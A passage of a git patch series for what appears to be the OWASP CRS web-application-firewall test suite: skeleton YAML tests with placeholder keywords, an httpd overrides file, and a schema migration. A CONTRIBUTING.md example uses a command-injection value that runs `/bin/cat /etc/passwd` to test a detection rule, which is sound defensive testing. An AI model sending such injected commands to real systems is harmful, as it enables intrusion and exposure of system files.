"skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML element includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><skeletonkeyword attribute_name=\"attribute_value\">value</skeletonkeyword></xml>" + output: + no_log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML attribute name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" - output: - no_log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element skeletonkeyword=\"attribute_value\">element_value</element></xml>" + output: + no_log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 12 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 13 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" - - - test_title: skeletonid-skeletontest + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>\n-----------------------------thisissparta--" + output: + log_contains: "id \"skeletonid\"" From adb552589c01e60438854a7ddb124f664fe8a114 Mon Sep 17 00:00:00 2001 From: Max Leske <maxleske@gmail.com> Date: Sun, 5 May 2024 08:08:21 +0200 Subject: [PATCH 08/18] feat: add platform overrides for httpd --- tests/regression/httpd-overrides.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 tests/regression/httpd-overrides.yaml diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml new file mode 100644 index 000000000..8f42ffa6e --- /dev/null +++ b/tests/regression/httpd-overrides.yaml @@ -0,0 +1,12 @@ +version: "v0.0.0" +meta: + engine: "ModSecurity v2" + platform: "httpd" + annotations: + - purpose: "CRS test suite" +test_overrides: + - rule_id: 920390 + test_ids: [1] + reason: 'Exceeds PCRE limits' + output: + expect_error: true From 586ae800963f1b3cad9e1eb06c4539e71b9dde42 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Fri, 31 May 2024 18:03:36 +0200 Subject: [PATCH 09/18] chore: update tests to newest schema --- CONTRIBUTING.md | 6 +- tests/regression/README.md | 2 +- tests/regression/nginx-overrides.yaml | 17 +- .../911100.yaml | 25 +- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 21 +- .../920100.yaml | 33 +- .../920120.yaml | 405 +++--- .../920121.yaml | 15 +- .../920160.yaml | 25 +- .../920170.yaml | 43 +- .../920171.yaml | 9 +- .../920180.yaml | 17 +- .../920181.yaml | 6 +- .../920190.yaml | 10 +- .../920200.yaml | 31 +- .../920201.yaml | 6 +- .../920202.yaml | 6 +- .../920210.yaml | 21 +- .../920220.yaml | 40 +- .../920221.yaml | 10 +- .../920230.yaml | 7 +- .../920240.yaml | 25 +- .../920250.yaml | 13 +- .../920260.yaml | 20 +- .../920270.yaml | 37 +- .../920271.yaml | 19 +- .../920272.yaml | 16 +- .../920273.yaml | 16 +- .../920274.yaml | 39 +- .../920275.yaml | 18 +- .../920280.yaml | 7 +- .../920290.yaml | 10 +- .../920300.yaml | 12 +- .../920310.yaml | 19 +- .../920311.yaml | 10 +- .../920320.yaml | 7 +- .../920330.yaml | 7 +- .../920340.yaml | 11 +- .../920341.yaml | 11 +- .../920350.yaml | 25 +- .../920360.yaml | 3 +- .../920370.yaml | 3 +- .../920380.yaml | 3 +- .../920390.yaml | 5 +- .../920400.yaml | 6 +- .../920410.yaml | 6 +- .../920420.yaml | 52 +- .../920430.yaml | 13 +- .../920440.yaml | 18 +- .../920450.yaml | 22 +- .../920451.yaml | 6 +- .../920460.yaml | 18 +- .../920470.yaml | 54 +- .../920480.yaml | 90 +- .../920490.yaml | 9 +- .../920500.yaml | 9 +- .../920510.yaml | 18 +- .../920520.yaml | 27 +- .../920521.yaml | 21 +- .../920530.yaml | 12 +- .../920540.yaml | 9 +- .../920600.yaml | 45 +- .../920610.yaml | 31 +- .../920620.yaml | 10 +- .../REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 33 +- .../REQUEST-921-PROTOCOL-ATTACK/921120.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921140.yaml | 6 +- .../REQUEST-921-PROTOCOL-ATTACK/921150.yaml | 6 +- .../REQUEST-921-PROTOCOL-ATTACK/921151.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921160.yaml | 18 +- .../REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 18 +- .../REQUEST-921-PROTOCOL-ATTACK/921190.yaml | 12 +- .../REQUEST-921-PROTOCOL-ATTACK/921200.yaml | 30 +- .../REQUEST-921-PROTOCOL-ATTACK/921210.yaml | 9 +- .../REQUEST-921-PROTOCOL-ATTACK/921220.yaml | 3 +- .../REQUEST-921-PROTOCOL-ATTACK/921230.yaml | 3 +- .../REQUEST-921-PROTOCOL-ATTACK/921240.yaml | 6 +- .../REQUEST-921-PROTOCOL-ATTACK/921421.yaml | 36 +- .../REQUEST-921-PROTOCOL-ATTACK/921422.yaml | 51 +- .../REQUEST-922-MULTIPART-ATTACK/922100.yaml | 9 +- .../REQUEST-922-MULTIPART-ATTACK/922110.yaml | 6 +- .../REQUEST-922-MULTIPART-ATTACK/922120.yaml | 6 +- .../930100.yaml | 12 +- .../930110.yaml | 36 +- .../930120.yaml | 30 +- .../930121.yaml | 30 +- .../930130.yaml | 6 +- .../931100.yaml | 3 +- .../931110.yaml | 9 +- .../931120.yaml | 24 +- .../931130.yaml | 66 +- .../931131.yaml | 3 +- .../932120.yaml | 15 +- .../932125.yaml | 9 +- .../932130.yaml | 48 +- .../932131.yaml | 6 +- .../932140.yaml | 474 ++++--- .../932160.yaml | 42 +- .../932161.yaml | 36 +- .../932170.yaml | 3 +- .../932171.yaml | 6 +- .../932175.yaml | 45 +- .../932180.yaml | 9 +- .../932190.yaml | 18 +- .../932200.yaml | 45 +- .../932205.yaml | 21 +- .../932206.yaml | 9 +- .../932210.yaml | 21 +- .../932220.yaml | 42 +- .../932230.yaml | 171 ++- .../932231.yaml | 3 +- .../932232.yaml | 21 +- .../932235.yaml | 114 +- .../932236.yaml | 240 ++-- .../932237.yaml | 102 +- .../932238.yaml | 30 +- .../932239.yaml | 159 ++- .../932240.yaml | 57 +- .../932250.yaml | 68 +- .../932260.yaml | 135 +- .../932300.yaml | 27 +- .../932301.yaml | 21 +- .../932310.yaml | 24 +- .../932311.yaml | 39 +- .../932320.yaml | 33 +- .../932321.yaml | 18 +- .../932330.yaml | 3 +- .../932331.yaml | 6 +- .../932370.yaml | 12 +- .../932380.yaml | 27 +- .../933100.yaml | 24 +- .../933110.yaml | 90 +- .../933111.yaml | 3 +- .../933120.yaml | 24 +- .../933130.yaml | 18 +- .../933131.yaml | 9 +- .../933140.yaml | 3 +- .../933150.yaml | 99 +- .../933151.yaml | 24 +- .../933160.yaml | 111 +- .../933161.yaml | 40 +- .../933170.yaml | 30 +- .../933180.yaml | 108 +- .../933190.yaml | 3 +- .../933200.yaml | 30 +- .../933210.yaml | 63 +- .../933211.yaml | 63 +- .../934100.yaml | 99 +- .../934101.yaml | 30 +- .../934110.yaml | 24 +- .../934120.yaml | 148 +- .../934130.yaml | 39 +- .../934140.yaml | 3 +- .../934150.yaml | 3 +- .../934160.yaml | 99 +- .../934170.yaml | 9 +- .../941100.yaml | 18 +- .../941101.yaml | 9 +- .../941110.yaml | 30 +- .../941120.yaml | 18 +- .../941130.yaml | 57 +- .../941140.yaml | 12 +- .../941150.yaml | 6 +- .../941160.yaml | 48 +- .../941170.yaml | 15 +- .../941180.yaml | 21 +- .../941181.yaml | 12 +- .../941190.yaml | 15 +- .../941200.yaml | 12 +- .../941210.yaml | 15 +- .../941220.yaml | 6 +- .../941230.yaml | 6 +- .../941240.yaml | 6 +- .../941250.yaml | 6 +- .../941260.yaml | 6 +- .../941270.yaml | 6 +- .../941280.yaml | 8 +- .../941290.yaml | 6 +- .../941300.yaml | 6 +- .../941310.yaml | 36 +- .../941320.yaml | 3 +- .../941330.yaml | 6 +- .../941340.yaml | 6 +- .../941350.yaml | 3 +- .../941360.yaml | 9 +- .../941370.yaml | 30 +- .../941380.yaml | 3 +- .../941390.yaml | 27 +- .../941400.yaml | 21 +- .../942100.yaml | 42 +- .../942101.yaml | 33 +- .../942120.yaml | 118 +- .../942130.yaml | 30 +- .../942131.yaml | 21 +- .../942140.yaml | 51 +- .../942150.yaml | 57 +- .../942151.yaml | 33 +- .../942152.yaml | 9 +- .../942160.yaml | 30 +- .../942170.yaml | 12 +- .../942180.yaml | 24 +- .../942190.yaml | 138 +- .../942200.yaml | 6 +- .../942210.yaml | 243 ++-- .../942220.yaml | 6 +- .../942230.yaml | 36 +- .../942240.yaml | 33 +- .../942250.yaml | 3 +- .../942251.yaml | 6 +- .../942260.yaml | 3 +- .../942270.yaml | 6 +- .../942280.yaml | 6 +- .../942290.yaml | 27 +- .../942300.yaml | 9 +- .../942310.yaml | 9 +- .../942320.yaml | 39 +- .../942321.yaml | 6 +- .../942330.yaml | 15 +- .../942340.yaml | 33 +- .../942350.yaml | 12 +- .../942360.yaml | 117 +- .../942361.yaml | 21 +- .../942362.yaml | 96 +- .../942370.yaml | 33 +- .../942380.yaml | 135 +- .../942390.yaml | 3 +- .../942400.yaml | 6 +- .../942410.yaml | 354 +++-- .../942420.yaml | 3 +- .../942421.yaml | 3 +- .../942430.yaml | 3 +- .../942431.yaml | 3 +- .../942432.yaml | 3 +- .../942440.yaml | 60 +- .../942450.yaml | 15 +- .../942460.yaml | 6 +- .../942470.yaml | 33 +- .../942480.yaml | 39 +- .../942490.yaml | 66 +- .../942500.yaml | 15 +- .../942510.yaml | 6 +- .../942511.yaml | 6 +- .../942520.yaml | 69 +- .../942521.yaml | 72 +- .../942522.yaml | 27 +- .../942530.yaml | 3 +- .../942540.yaml | 21 +- .../942550.yaml | 108 +- .../942560.yaml | 6 +- .../943100.yaml | 6 +- .../943110.yaml | 12 +- .../943120.yaml | 3 +- .../944000.yaml | 4 +- .../944100.yaml | 55 +- .../944110.yaml | 55 +- .../944120.yaml | 408 ++++-- .../944130.yaml | 1254 +++++++++++------ .../944140.yaml | 27 +- .../944150.yaml | 73 +- .../944151.yaml | 76 +- .../944152.yaml | 79 +- .../944200.yaml | 4 +- .../944210.yaml | 153 +- .../944240.yaml | 264 ++-- .../944250.yaml | 66 +- .../944260.yaml | 6 +- .../944300.yaml | 990 ++++++++----- .../949110.yaml | 12 +- .../951110.yaml | 3 +- .../951120.yaml | 3 +- .../951130.yaml | 3 +- .../951140.yaml | 3 +- .../951150.yaml | 3 +- .../951160.yaml | 3 +- .../951170.yaml | 3 +- .../951180.yaml | 3 +- .../951190.yaml | 3 +- .../951200.yaml | 3 +- .../951210.yaml | 3 +- .../951220.yaml | 6 +- .../951230.yaml | 6 +- .../951240.yaml | 6 +- .../951250.yaml | 3 +- .../951260.yaml | 3 +- .../953100.yaml | 15 +- .../953101.yaml | 15 +- .../953120.yaml | 21 +- .../954100.yaml | 3 +- .../954120.yaml | 6 +- .../tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 9 +- .../tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 3 +- .../959100.yaml | 6 +- .../RESPONSE-980-CORRELATION/980170.yaml | 11 +- 294 files changed, 7906 insertions(+), 4132 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index fc0a6aa47..d556c40e4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -387,7 +387,8 @@ Example of a simple *positive test*: data: "var=` /bin/cat /etc/passwd`" version: HTTP/1.1 output: - log_contains: id "932230" + log: + expect_ids: [932230] ``` This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. @@ -414,7 +415,8 @@ Example of a simple *negative test*: data: 'foo=ping pong tables' uri: '/post' output: - no_log_contains: id "932260" + log: + no_expect_ids: [932260] ``` This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. diff --git a/tests/regression/README.md b/tests/regression/README.md index 43f8e83d7..7c8cb0e1e 100644 --- a/tests/regression/README.md +++ b/tests/regression/README.md @@ -16,7 +16,7 @@ The OWASP CRS project was part of the effort to develop the Web Application Fire meta: author: "csanders-git" name: "911100.yaml" - description: "Description" + description: "A meaningful description" rule_id: 911100 tests: - test_id: 1 diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index 41b04c3b8..cb2cd55c4 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -11,23 +11,22 @@ test_overrides: reason: "Nginx returns a 400 bad request" output: status: 400 - expect_error: false - rule_id: 920100 test_ids: [8] reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" output: status: 404 - expect_error: false - rule_id: 920100 test_ids: [14] reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." output: - expect_error: true + status: 400 - rule_id: 920100 test_ids: [16] reason: "Seems like Nginx does a normalization of the request line, and if <schema>://<hostname> is sent (without a path) the request path becomes / by default" output: - expect_error: true + log: + no_expect_ids: [920100] - rule_id: 920181 test_ids: [1] reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" @@ -37,7 +36,6 @@ test_overrides: test_ids: [4] reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" output: - expect_error: false status: 200 log: expect_ids: [920270] @@ -45,29 +43,22 @@ test_overrides: test_ids: [4] reason: "Nginx returns 400 if Host header is missing" output: - log: - expect_ids: [] status: 400 - rule_id: 920430 test_ids: [8] reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." output: - log: - 